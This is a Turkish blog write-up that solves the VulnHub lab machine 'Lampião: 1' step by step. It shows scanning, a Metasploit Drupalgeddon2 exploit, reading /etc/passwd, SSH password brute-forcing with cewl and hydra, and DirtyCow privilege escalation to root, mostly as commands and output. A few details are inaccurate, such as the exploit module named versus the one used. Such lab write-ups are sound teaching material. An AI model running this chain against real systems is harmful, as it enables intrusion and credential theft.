Avatar
Ben Süleyman ERGEN. Siber güvenlik benim alanımdır. Bol bol ctf çözer ve write-up yazarım. Burada ise edindiğim tecrübeleri ve bilgileri paylaşıyorum.

VULNHUB Lampião: 1 WRITEUP

VULNHUB Lampião: 1 WRITEUP

Merhabalar. Bu yazımda vulnhub sitesinde yer alan Lampião: 1 çözeceğiz.

Eğer metasploit, exploit, meterpreter, hydra hakkında bir fikriniz yoksa önce yazıyı anlamak için bu kavramları araştırmanızı tavsiye ederim.

Makineyi indirdikten sonra virtualbox ile açabiliriz. Ardından network adapter'ı kendinize uygun olarak ayarlamanız gerekiyor. Benim bilgisayarda kali kurulu olduğu için bridge olarak ayarladım. Eğer siz kali yada parrot'u sanal mikinede kullanıyorsanız NAT olarak ayarlayabilirsiniz. Neyse çok uzatmadan başlayalım.

IP Adresinin Tespiti

Kali ve Parrot da kurulu olarak gelen nediscover aracı ile ağdaki cihazları tespit edebilirsiniz.

┌─[✗]─[hatsat@HATSAT]─[~]
└──╼ $sudo netdiscover
 172.16.0.177  08:00:27:3e:b2:97   2   84 PCS Systemtechnik GmbH

Benim bağlı olduğum ağda çok fazla cihaz olduğu ve güvenlik gerekçesi ile diğer cihazların kayıtlarını sildim. Çıktı yukarıdakine benzer bi şey olacak. Mac adresi farklı olabilir, sorun yok. Artık IP adresini bildiğimize göre sıradaki aşamaya geçebiliriz.

Nmap Taraması

Namp yada zenmap kullanarak tarama yapalım.

┌─[✗]─[hatsat@HATSAT]─[~]
└──╼ $sudo nmap -sS -sV -A -p- 172.16.0.177
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-11 19:30 +03
Nmap scan report for 172.16.0.177
Host is up (0.00073s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
22/tcp  open ssh   OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|  1024 46:b1:99:60:7d:81:69:3c:ae:1f:c7:ff:c3:66:e3:10 (DSA)
|  2048 f3:e8:88:f2:2d:d0:b2:54:0b:9c:ad:61:33:59:55:93 (RSA)
|  256 ce:63:2a:f7:53:6e:46:e2:ae:81:e3:ff:b7:16:f4:52 (ECDSA)
|_ 256 c6:55:ca:07:37:65:e3:06:c1:d6:5b:77:dc:23:df:cc (ED25519)
80/tcp  open http?
| fingerprint-strings:
|  NULL:
|   _____ _ _
|   |_|/ ___ ___ __ _ ___ _ _
|   \x20| __/ (_| __ \x20|_| |_
|   ___/ __| |___/ ___|__,_|___/__, ( )
|   |___/
|   ______ _ _ _
|   ___(_) | | | |
|   \x20/ _` | / _ / _` | | | |/ _` | |
|_  __,_|__,_|_| |_|
1898/tcp open http  Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Lampi\xC3\xA3o
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.70%I=7%D=11/11%Time=5BE8593C%P=x86_64-pc-linux-gnu%r(NUL
SF:L,1179,"\x20_____\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\|_\x20\x20\x20_\|\x20\|\x20\(\
SF:x20\)\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\n\x20\x20\|\x20\|\x20\|\x20\|_\|/\x20___\x20\x20\x20\x20___\x20\x2
SF:0__\x20_\x20___\x20_\x20\x20\x20_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
SF:n\x20\x20\|\x20\|\x20\|\x20__\|\x20/\x20__\|\x20\x20/\x20_\x20\\/\x20_`
SF:\x20/\x20__\|\x20\|\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20_
SF:\|\x20\|_\|\x20\|_\x20\x20\\__\x20\\\x20\|\x20\x20__/\x20\(_\|\x20\\__\
SF:x20\\\x20\|_\|\x20\|_\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x
SF:20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\\___/\x20\\__\
SF:|\x20\|___/\x20\x20\\___\|\\__,_\|___/\\__,\x20\(\x20\)\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20__/\x20\|/\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\n\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|___/\x20\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\n______\x20_\x20\x20\x20\x20\x20\x20\x20_\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20_\x20\n\|\x20\x20___\(_\)\x20\x20\
SF:x20\x20\x20\|\x20\|\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
SF:\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\|\x20\|\n
SF:\|\x20\|_\x20\x20\x20_\x20\x20\x20\x20__\|\x20\|_\x20\x20\x20_\x20_\x20
SF:__\x20___\x20\x20\x20__\x20_\x20\x20\x20\x20___\x20\x20__\x20_\x20_\x20
SF:\x20\x20_\x20\x20__\x20_\|\x20\|\n\|\x20\x20_\|\x20\|\x20\|\x20\x20/\x2
SF:0_`\x20\|\x20\|\x20\|\x20\|\x20'_\x20`\x20_\x20\\\x20/\x20_`\x20\|\x20\
SF:x20/\x20_\x20\\/\x20_`\x20\|\x20\|\x20\|\x20\|/\x20_`\x20\|\x20\|\n\|\x
SF:20\|\x20\x20\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|_\|\x20\|\x20\|\x20\
SF:|\x20\|\x20\|\x20\|\x20\(_\|\x20\|\x20\|\x20\x20__/\x20\(_\|\x20\|\x20\
SF:|_\|\x20\|\x20\(_\|\x20\|_\|\n\\_\|\x20\x20\x20\|_\|\x20\x20\\__,_\|\\_
SF:_,_\|_\|\x20\|_\|");
MAC Address: 08:00:27:3E:B2:97 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT   ADDRESS
1  0.73 ms 172.16.0.177

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.52 seconds

taramanın çıktısı buna benzer bi şey olması gerekiyor. Parametreler ise:

 • -sS service scan
 • -sV version scan
 • -p- tür portları tara
 • -A script, OS, version detection, traceroute taramalarının kısaltılmış yazımı

Çıktıyı incelediğimizde üç tane port açık olduğunu görüyoruz.

 • 22 ssh
 • 80 http
 • 1898 http

Artık portları ve hizmetleri de biliyoruz.

http Server Üzerinde Gezinti

80 ve 1898 portlarına sırayla bağlanarak sitede dolaşalım. Bakalım ne çıkacak.

80 portundan açtığımızda basit bi web sayfasından başka bi şey çıkmıyor. dirb ile tarama yaptığımdada bi şey çıkmadı ve hata verdi. O zaman diğer porta geçelim.

┌─[✗]─[hatsat@HATSAT]─[~]
└──╼ $dirb http://172.16.0.177/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Nov 11 19:40:48 2018
URL_BASE: http://172.16.0.177/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.16.0.177/ ----

(!) FATAL: Too many errors connecting to host
  (Possible cause: OK)

-----------------
END_TIME: Sun Nov 11 19:40:52 2018
DOWNLOADED: 0 - FOUND: 0

1898 portundan girdiğimizde ise bir web sayfası karşımıza çıkıyor. Drupal ile yapılmış. Siteyi sayfa sayfa dolaşıp kaynak kodu inceledikten sonra bi şey bulamadım (Eğer bulan arkadaş olduysa yorumda belirtirlerse sevinirim). dirb ile taradıktan ve sonuçlardan bi kaç dizini dolaştıktan sonra buradan bi şey çıkmayacağını anladım ve yöntem değiştirmeye karar verdim. dirb taramasının sonucu aşağıda.

┌─[✗]─[hatsat@HATSAT]─[~]
└──╼ $dirb http://172.16.0.177:1898/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Sun Nov 11 19:45:37 2018
URL_BASE: http://172.16.0.177:1898/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://172.16.0.177:1898/ ----
==> DIRECTORY: http://172.16.0.177:1898/includes/
+ http://172.16.0.177:1898/index.php (CODE:200|SIZE:11400)
==> DIRECTORY: http://172.16.0.177:1898/misc/
==> DIRECTORY: http://172.16.0.177:1898/modules/
==> DIRECTORY: http://172.16.0.177:1898/profiles/
+ http://172.16.0.177:1898/robots.txt (CODE:200|SIZE:2189)
==> DIRECTORY: http://172.16.0.177:1898/scripts/
+ http://172.16.0.177:1898/server-status (CODE:403|SIZE:294)
==> DIRECTORY: http://172.16.0.177:1898/sites/
==> DIRECTORY: http://172.16.0.177:1898/themes/
+ http://172.16.0.177:1898/web.config (CODE:200|SIZE:2200)
+ http://172.16.0.177:1898/xmlrpc.php (CODE:200|SIZE:42)

---- Entering directory: http://172.16.0.177:1898/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
  (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.16.0.177:1898/misc/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
  (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.16.0.177:1898/modules/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
  (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.16.0.177:1898/profiles/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
  (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.16.0.177:1898/scripts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
  (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.16.0.177:1898/sites/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
  (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://172.16.0.177:1898/themes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
  (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Sun Nov 11 19:45:39 2018
DOWNLOADED: 4612 - FOUND: 5

Exploit Denemesi

İnterneten araştırma yaparken drupal için exploit ile ilgili bi yazı gördüm. Bende metasploit üzerinde bi arama yaparak drupal için exploit buldum.

┌─[root@HATSAT]─[/home/hatsat]
└──╼ #msfconsole


         _---------.
       .' #######  ;."
 .---,.  ;@       @@`;  .---,..
." @@@@@'.,'@@      @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@     @@@@@@@@@@@@@ @;
  `.@@@@@@@@@@@@    @@@@@@@@@@@@@@ .'
   "--'.@@@ -.@    @ ,'-  .'--"
     ".@' ; @    @ `. ;'
      |@@@@ @@@   @  .
       ' @@@ @@  @@  ,
       `.@@@@  @@  .
        ',@@   @  ;      _____________
         (  3 C  )   /|___ / Metasploit! \
         ;@'. __*__,."  \|--- \_____________/
         '(.,...."/


    =[ metasploit v4.17.24-dev             ]
+ -- --=[ 1825 exploits - 1033 auxiliary - 318 post    ]
+ -- --=[ 541 payloads - 44 encoders - 10 nops      ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search drupal

Matching Modules
================

  Name                      Disclosure Date Rank    Check Description
  ----                      --------------- ----    ----- -----------
  auxiliary/gather/drupal_openid_xxe       2012-10-17    normal   Yes  Drupal OpenID External Entity Injection
  auxiliary/scanner/http/drupal_views_user_enum 2010-07-02    normal   Yes  Drupal Views Module Users Enumeration
  exploit/multi/http/drupal_drupageddon     2014-10-15    excellent No   Drupal HTTP Parameter Key/Value SQL Injection
  exploit/unix/webapp/drupal_coder_exec     2016-07-13    excellent Yes  Drupal CODER Module Remote Command Execution
  exploit/unix/webapp/drupal_drupalgeddon2    2018-03-28    excellent Yes  Drupal Drupalgeddon 2 Forms API Property Injection
  exploit/unix/webapp/drupal_restws_exec     2016-07-13    excellent Yes  Drupal RESTWS Module Remote PHP Code Execution
  exploit/unix/webapp/php_xmlrpc_eval      2005-06-29    excellent Yes  PHP XML-RPC Arbitrary Code Execution

exploit/unix/webapp/drupal_coder_exec 2016-07-13 excellent Yes Drupal CODER Module Remote Command Execution isimli exploiti kullanarak sisteme girebiliriz.

use komutu ile exploiti seçelim. Ardından set komutu ile RHOST ve RPORT parameterlerine gerekli değerleri atayalım. Burada IP adresi sizde farıklı olabilir. Sizdeki IP adresini girmelisiniz. Ardından exploit diyerek exploiti çalıştırabiliriz.

use exploit/unix/webapp/drupal_drupalgeddon2
show options
set RHOST 172.16.0.177
set RPORT 1898
exploit

Ardından meterpreter açılacak. Yardım için help komutunu girebilirsiniz. Ben shell komutu ile shell aldım. Biraz dizinlerde dolaştıktan bazı dosyaları inceledikten sonra /etc/passwd dosyasına baktım. Çıktı şu şekilde olacak:

cat /etc/passwd
tiago:x:1000:1000:tiago,,,:/home/tiago:/bin/bash
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent

Dosyayı incelediğimizde tiago kullanıcısını görüyoruz. uid si ise 1000. Bu kullanıcı ile ssh üzerinden sisteme giriş yapabiliriz. Peki ya parolası???

Cewl ve Hytra Kullancı Parolası Kırma

Onlarca başarısız deneme ve bolca uğraşdan sonra sonunda cevabı buldum. cewl aracı. Bu araç web sayfası üzerinden wordlist oluşturmaya yarıyor. O zaman cewl ile worlist oluşturalım :)

cewl -d 3 -m 5 http://172.16.0.177:1898/ -w cewl_pass_tiago.txt

Parametreler şu şekilde:

 • -d derinlik demek. Yani web sitesinde ne kadar derine gidecek.
 • -m minimum uzunluk demek. En kısa parola uzunluğu.
 • -w çıktının kaydedileceği dosya.

Bu dosyayı kullanaraş bruteforce yöntemi ile şifreyi kırmayı deneyebiliriz. Şansımız yaver giderse …

Sıra geldi hydra ile ssh şifresi kırmaya. hydra gelişmiş bi şifre kırma aracıdır. Kali ve parrot da kurulu olarak gelir. Programı şu şekilde kullanabiliriz.

┌─[✗]─[root@HATSAT]─[/home/hatsat/TMP]
└──╼ #hydra 172.16.0.177 ssh -l tiago -P cewl_pass_tiago.txt
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-11 17:59:10
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 603 login tries (l:1/p:603), ~38 tries per task
[DATA] attacking ssh://172.16.0.177:22/
[22][ssh] host: 172.16.0.177  login: tiago  password: Virgulino
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 4 final worker threads did not complete until end.
[ERROR] 4 targets did not resolve or could not be connected
[ERROR] 16 targets did not complete
Hydra (http://www.thc.org/thc-hydra) finished at 2018-11-11 17:59:28

Parametreler:

 • ssh kullanılan protokol.
 • -l kullanıcının ismi. Bu örnekte tiago
 • -P wordlist. cewl ile oluşturduğumuz wordlist.

Bu komut ile parolayı bulduk. Parola: Virgulino

SSH Login ve Sonrası

Bu bilgiler ile SSH ile sisteme login olabiliriz. ssh [email protected] komutu ile. Şu anda sistemdeyiz fakat henüz root değiliz.

┌─[hatsat@HATSAT]─[~]
└──╼ $ssh [email protected]
[email protected]'s password:
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation: https://help.ubuntu.com/

 System information as of Sun Nov 11 18:15:51 BRST 2018

 System load: 0.07       Processes:      174
 Usage of /:  7.5% of 19.07GB  Users logged in:   0
 Memory usage: 27%        IP address for eth0: 172.16.0.177
 Swap usage:  0%

 Graph this data and manage this system at:
  https://landscape.canonical.com/

New release '16.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Sun Nov 11 18:15:51 2018 from 172.16.0.106
tiago@lampiao:~$

Birkaç başarısız deneme ve araştırmadan sonra tekrar exploit arayışına girdim. Sistemin kernel sürümüne uygun bi exploit buldum. Kernel sürümünü şu şekilde öğrenebilirsiniz.

tiago@lampiao:~$ uname -a
Linux lampiao 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux

4.4.0-31-generic kernel sürümü için exploit ararken buradaki exploiti buldum. Ardından scp komutu ile bu exploiti sunucuya yükleyip çalıştırabiliriz.

┌─[✗]─[hatsat@HATSAT]─[~/Downloads]
└──╼ $scp 40847.cpp [email protected]:~
[email protected]'s password:
40847.cpp                         100%  10KB 14.8MB/s  00:00

Şimdi derleyip çalıştıralım.

tiago@lampiao:~$ g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil
tiago@lampiao:~$ ./dcow
Running ...
Received su prompt (Password: )
Root password is:  dirtyCowFun
Enjoy! :-)

Ve artık root parolası elimizde. Parola: dirtyCowFun

tiago@lampiao:~$ su
Password:
root@lampiao:/home/tiago#

Şimdi root dizinindeki flag dosyasını okuyabiliriz.

root@lampiao:~# cat /root/flag.txt
9740616875908d91ddcdaa8aea3af366

Bu makine boyunca araştırdığım konular şu şekilde.

 • metasploit
 • meterpreter
 • hydra
 • cewl
 • scp

Bu vulnbubdan vulnhub dan çözdüğüm ilk makine idi. Beni oldukça yordu fakat devam edeceğim.

Umarım bu yazı size faydalı olmuştur. Eğer bi hatam varsa bana bildirmekten yorum atmaktan çekinmeyin. Şimdiden teşekkürler. Başarılar….

all tags